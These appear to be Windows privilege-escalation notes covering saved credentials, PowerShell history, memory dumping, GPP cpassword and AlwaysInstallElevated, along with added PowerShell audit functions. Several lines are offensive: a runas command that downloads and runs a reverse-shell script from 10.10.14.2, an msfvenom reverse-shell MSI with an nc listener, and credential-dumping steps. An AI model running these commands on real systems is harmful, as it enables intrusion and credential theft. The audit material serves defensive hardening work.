M4RCG04M
Windows

Unattended Installation

Unattend.xml is an answer file used for unattended Windows installations. These files may contain base64-encoded or plain-text credentials (local account passwords, auto-logon settings) and other sensitive system information.

Common locations of these files:

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Autounattend.xml

Windows Credential Manager

On production servers an administrator often has to enter the same credentials repeatedly, and users also save their credentials in Credential Manager for quick access. Credential Manager stores both Web Credentials and Windows Credentials.

If an attacker gains access to the system as that user, physically or remotely, the saved entries can be used to run an application with those credentials.

To list all the stored credentials:

cmdkey /list

The password itself is not displayed, but runas /savecred can authenticate as a user whose credentials are saved:

runas.exe /savecred /user:administrator cmd

// Hosting Nishang shell
runas.exe /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/rev.ps1')"
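To review which saved entries are exposed to runas /savecred, the raw cmdkey /list output can be turned into objects. The following is an added example, not part of the original notes; the sample output embedded in it is constructed in the layout cmdkey prints, and the parser assumes the "Target:", "Type:" and "User:" line prefixes.

```powershell
# Added example (not from the original notes): parse "cmdkey /list" output into
# objects so saved credentials can be reviewed and, where unwanted, removed.
function Get-SavedCredentialEntry {
    param(
        # Defaults to the live output; pass -Raw to parse captured text instead.
        [string]$Raw = (cmdkey /list | Out-String)
    )
    $entries = @()
    $current = $null
    foreach ($line in ($Raw -split "`r?`n")) {
        $t = $line.Trim()
        if ($t -match '^Target:\s*(.+)$') {
            # A new "Target:" line starts a new entry.
            if ($current) { $entries += $current }
            $current = [pscustomobject]@{ Target = $Matches[1]; Type = $null; User = $null }
        }
        elseif ($current -and $t -match '^Type:\s*(.+)$') { $current.Type = $Matches[1] }
        elseif ($current -and $t -match '^User:\s*(.+)$') { $current.User = $Matches[1] }
    }
    if ($current) { $entries += $current }
    return $entries
}

# Constructed sample output (not captured from a real host).
$sample = @'
Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

    Target: LegacyGeneric:target=fileserver01
    Type: Generic
    User: svc_backup
'@

Get-SavedCredentialEntry -Raw $sample | Format-Table -AutoSize
```

Entries of type "Domain Password" are the ones runas /savecred can reuse. An administrator who finds a privileged account saved on a shared or low-trust machine removes it with cmdkey /delete:<Target>, using the Target value from the listing.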

PowerShell History

PowerShell stores the command history of each interactive session in a text file (via PSReadLine). If an administrator has typed hard-coded credentials into PowerShell while working in a regular user's environment (for example a student account), that history has to be cleaned up afterwards. If the administrator forgets to clean it, sensitive information such as credentials and configuration settings is exposed to that user.

The default location for the PowerShell command history:

C:\Users\Test\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

// $env:APPDATA already resolves to ...\AppData\Roaming, so do not repeat "Roaming" in the path
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
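A quick way to audit a history file for leaked secrets is to resolve the real path from PSReadLine and grep it for credential-looking commands. This is an added example, not from the original notes; the keyword list is an assumption about what "looks like a credential", and the history written to a temp file below is constructed.

```powershell
# Added example (not from the original notes): locate the PSReadLine history file
# and report the lines that look like they carry secrets.
function Find-SensitiveHistoryLine {
    param(
        # PSReadLine knows where it saves history; this is the same file the notes point at.
        [string]$Path = (Get-PSReadLineOption).HistorySavePath,
        # Assumed indicators; extend for your environment.
        [string[]]$Patterns = @(
            'password', 'passwd', 'pwd', '-Credential', 'ConvertTo-SecureString',
            'net user', 'runas', 'cmdkey', '/savecred'
        )
    )
    if (-not (Test-Path -Path $Path)) { return @() }
    # Build one case-insensitive alternation from the literal keywords.
    $regex = ($Patterns | ForEach-Object { [regex]::Escape($_) }) -join '|'
    Get-Content -Path $Path | Select-String -Pattern $regex | ForEach-Object {
        [pscustomobject]@{ Line = $_.LineNumber; Command = $_.Line.Trim() }
    }
}

# Constructed sample history, written to a temp file so the function runs offline.
$tmp = Join-Path $env:TEMP 'sample_history.txt'
@(
    'Get-ChildItem C:\Users',
    'net user svc_backup P@ssw0rd! /add',
    '$cred = Get-Credential',
    'runas /user:ACCESS\Administrator /savecred cmd'
) | Set-Content -Path $tmp

Find-SensitiveHistoryLine -Path $tmp | Format-Table -AutoSize   # reports lines 2, 3 and 4
Remove-Item -Path $tmp
```

On a machine where administrators log in interactively, Set-PSReadLineOption -HistorySaveStyle SaveNothing in the admin profile stops the file from being written at all; otherwise the file should be cleared after privileged work.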

Process Memory

To check the processes running:

ps

Then you can dump the memory of the process of interest:

// Search the pid
ps | findstr "<process>"

.\procdump64.exe -accepteula -ma <id>

Then use strings to look for passwords in the dump:

strings <file> | grep pass

Registry Autoruns

Autoruns for system startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Autoruns for user login:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Configuration of Windows Services, which can run with elevated privileges:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Enumeration

To check the programs which are configured to start on system startup:

Get-ACL -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' |
Format-List

If a normal user has Full Control over the key, this can be used as a privilege escalation technique.
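Reading the Format-List output by eye does not scale across the Run keys and every service subkey, so the check can be automated: walk the keys and report any Allow ACE that gives a low-privileged principal a write right. This is an added example, not from the original notes; which principals count as low-privileged, and the extra RunOnce key, are assumptions.

```powershell
# Added example (not from the original notes): report autorun and service
# registry keys where a low-privileged principal holds write rights.
function Get-WritableAutorunKey {
    param(
        [string[]]$Keys = @(
            'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKLM:\SYSTEM\CurrentControlSet\Services'
        ),
        # Assumed set of principals a normal user is a member of.
        [string[]]$LowPrivPrincipals = @(
            'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
        )
    )
    # Rights that let a caller change what the key launches or re-ACL it.
    # WriteKey is deliberately not used: its mask also contains READ_CONTROL,
    # which would make every read-only ACE look like a write.
    $writeMask = [System.Security.AccessControl.RegistryRights]::SetValue -bor
                 [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                 [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                 [System.Security.AccessControl.RegistryRights]::TakeOwnership

    # Expand the Services key into one entry per service.
    $targets = foreach ($k in $Keys) {
        $k
        if ($k -like '*\Services') {
            Get-ChildItem -Path $k -ErrorAction SilentlyContinue | ForEach-Object { $_.PSPath }
        }
    }

    foreach ($t in $targets) {
        $acl = Get-Acl -Path $t -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.RegistryRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Key       = $t -replace '^Microsoft\.PowerShell\.Core\\Registry::', ''
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-WritableAutorunKey | Format-Table -AutoSize
```

An empty result is the expected state on a default install. Any hit is a finding: whatever a member of that principal writes under a Run key executes at the next logon, and a writable service key lets the service's ImagePath be changed, so the ACE should be removed or reduced to read.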

ACLS

We can check for ACL misconfigurations using icacls:

icacls <path>

If we have Full Control over a folder, we can grant a user permissions on a file inside that folder with:

icacls <file> /grant <user>:F

SYSVOL & GPP (MS14-025)

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
// pass the cpassword value found in the XML
gpp-decrypt "<cpassword>"
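For an audit you usually want to know which policy files still carry a cpassword and for which account, without decrypting anything. The following is an added example, not from the original notes; the default SYSVOL path is built from $env:USERDNSDOMAIN (an assumption about the environment), and the Groups.xml written to a temp folder below is constructed with a placeholder cpassword value.

```powershell
# Added example (not from the original notes): find Group Policy Preference XML
# files that still carry a cpassword attribute and report where and for whom.
function Find-GppCpassword {
    param(
        # Assumes the default SYSVOL layout; override for a different share.
        [string]$SysvolPath = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies"
    )
    Get-ChildItem -Path $SysvolPath -Recurse -Filter '*.xml' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_.FullName
            try { [xml]$doc = Get-Content -Path $file -Raw } catch { return }   # skip non-XML
            # cpassword sits on the <Properties> element of Groups, ScheduledTasks,
            # Services, DataSources and Drives preferences; match any element that has it.
            foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
                [pscustomobject]@{
                    File      = $file
                    Element   = $node.ParentNode.LocalName
                    UserName  = $node.GetAttribute('userName')
                    RunAs     = $node.GetAttribute('runAs')
                    NewName   = $node.GetAttribute('newName')
                    HasSecret = [bool]$node.GetAttribute('cpassword')   # empty attribute = no password
                }
            }
        }
}

# Constructed sample: a Groups.xml in the directory layout SYSVOL uses.
$root = Join-Path $env:TEMP 'gpp_sample'
$dir  = Join-Path $root 'Policies\{CONSTRUCTED-GUID}\Machine\Preferences\Groups'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)">
    <Properties action="U" newName="localadm" cpassword="CONSTRUCTED_SAMPLE_CPASSWORD" userName="Administrator (built-in)"/>
  </User>
</Groups>
'@ | Set-Content -Path (Join-Path $dir 'Groups.xml')

Find-GppCpassword -SysvolPath $root | Format-List
Remove-Item -Path $root -Recurse
```

The MS14-025 update only stops new passwords being stored through the GPP editor; XML files created before the patch keep their cpassword until the preference is removed or re-saved, which is why this search is still worthwhile on patched domains.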

AlwaysInstallElevated

Enumerate the following registry keys; if AlwaysInstallElevated is set to 1 in both the HKCU and the HKLM policy key, we can exploit it:

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
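Windows Installer only honours the setting when both the machine and the user policy value are 1, so the four reg query lines need to be read together. The following is an added example, not from the original notes, that does that check in one call; it uses only the two policy keys listed above.

```powershell
# Added example (not from the original notes): report whether AlwaysInstallElevated
# is actually effective, i.e. set to 1 under BOTH HKLM and HKCU.
function Test-AlwaysInstallElevated {
    $paths = @{
        Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = @{}
    foreach ($scope in $paths.Keys) {
        # Missing key or missing value both mean "not configured".
        $item = Get-ItemProperty -Path $paths[$scope] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$scope] = if ($item) { [int]$item.AlwaysInstallElevated } else { $null }
    }
    [pscustomobject]@{
        MachineValue = $state['Machine']
        UserValue    = $state['User']
        Effective    = ($state['Machine'] -eq 1 -and $state['User'] -eq 1)
    }
}

Test-AlwaysInstallElevated
```

Effective = True is the condition the rest of this section relies on. The fix is the Group Policy setting "Always install with elevated privileges" under Windows Components > Windows Installer, which exists in both Computer Configuration and User Configuration and should be Disabled in both.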

Create a msfvenom payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -a x64 --platform windows -f msi -o ignite.msi

Upload the .msi file to the machine, open a listener and execute:

nc -nvlp <port>
msiexec /quiet /qn /i ignite.msi

Last updated 19 days ago